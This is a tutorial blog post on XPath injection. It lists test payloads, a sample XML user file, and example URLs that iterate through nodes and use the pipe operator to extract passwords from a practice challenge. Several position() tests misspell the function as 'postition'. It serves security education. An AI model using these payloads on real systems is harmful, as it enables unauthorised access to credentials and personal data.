Xpath Injection (Final)

July 8, 2015 | Views: 3195

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

1. Testing and confirming Xpathi

Testing for Xpath and confirming are the most important parts. Most of us, and specially the readers of securityidiots, see SQLi everywhere and anywhere they find an error – even if the error is a Conversional Error, Internal Error or Programming Error. Sometimes, people assume that getting blocked by WAF upon typing “Union Select” means it’s vulnerable to SQLi.

When we see an input field, the first thing we’ll do is make it true using the below tests:

1 or 1=1
1 or true
' or ''='
" or ""="

In the case of Xpath or SQLi and many other Injections, they will work the same. To confirm if it’s Xpathi, we can use the position() function, which is specific to Xpathi. Here are few tests we can try:

1 or postition()=1 or 1=1
1 or postition()=1 or true
' or postition()=1 or ''='
" or postition()=1 or ""="

If any of the above works, then you can assume that the injection you are dealing with is a Xpath Injection. Below is an example XML file, which we’ ll be using throughout this tutorial:

 

<xmlfile>
<users>
	<user>
		<name first="example" last="example"/>
		<id>1</id>
		<username>Test</username>
		<password>T</password>
		<phone>123-456-7890</phone>
	</user>
	<user>
		<name first="example" last="example"/>
		<id>2</id>
		<username>example</username>
		<password>i_om-GAWWWD</password>
		<phone>603-478-4115</phone>
	</user>
	<user>
		<name first="example" last="example"/>
		<id>3</id>
		<username>example</username>
		<password>ihavemoregfsthanyou</password>
		<phone>222-222-2222</phone>
	</user>
	<user>
		<name first="example" last="example"/>
		<id>4</id>
		<username>example</username>
		<password>SelectPassFromDual</password>
		<phone>88-777-8989</phone>
	</user>
</users>
</xmlfile>


Here are some basic Xpath queries, which can be used to extract data from the above file:

To Extract username where id=1
/xmlfile/users/user[id='1']/username
To Extract username where id=2
/xmlfile/users/user[id='2']/username
To Extract password where username is Monster
/xmlfile/users/user[username="Monster"]/password
To Extract phone where username is Trojan and password is ihavemoregfsthanyou
/xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone
To Extract the first username
/xmlfile/users/user[position()=1]/username


Looking at all the above example queries, I believe it’s clear enough to understand the basic way of extracting data using Xpath queries.

 

2. Iterating through the Nodes

Let’s try injecting it with Xpath. Before we start injecting, let’s assume the query that could be working inside. It should be something like “/root/semething/user[username=”<Our_Intput_here>”]/phone” . Assuming this, let’s try these injections:

http://example.net/challenge1/challenge_2.php?username='or''='
And we got the number of first user, now to get the number of second user we ll use position() as i used before above
http://example.net/challenge1/challenge_2.php?username='or position()=2 and''='
And we got the number of Second user, so on we can keep changing position() to get the rest of users phone numbers.
http://example.net/challenge1/challenge_2.php?username='or position()=3 and''='
And we got the number of Third user, so on we can keep changing position() to get the rest of users phone numbers.

We’re done iterating through the nodes, but the problem is we aren’t able to extract the other details like passwords etc., which should and must be saved in the same XML file.

 

3. Extracting Data from Siblings

Until now, we were using position. We’re able to enumerate through the nodes only, but /phone on the end is hard coded. We can’t change it to extract other data. But fear not!! We have the Pipe operator, which works to combine two queries in Xpath. Here’s how we can do this:

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
The above Injection extracts the Second Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
The above Injection extracts the Third Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
The above Injection extracts the Forth Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
The above Injection extracts the Fifth Element from first node.
http://example.net/challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
Here i changed the position which means it will extract data from the second node second element, so on you can keep changing and extracting.

Using this, we can extract data with zero knowledge of the internal file structure. Here’s a Xpathi challenge you can try, solving the above method:

Previous: Part 2

 

Thanks for reading this series of posts!

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
2 Comments
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 742 / December 14, 2019
How do I Get MTA Certified?
Views: 1314 / December 12, 2019
How much does your PAM software really cost?
Views: 1751 / December 10, 2019
How Do I Get into Android Development?
Views: 2141 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel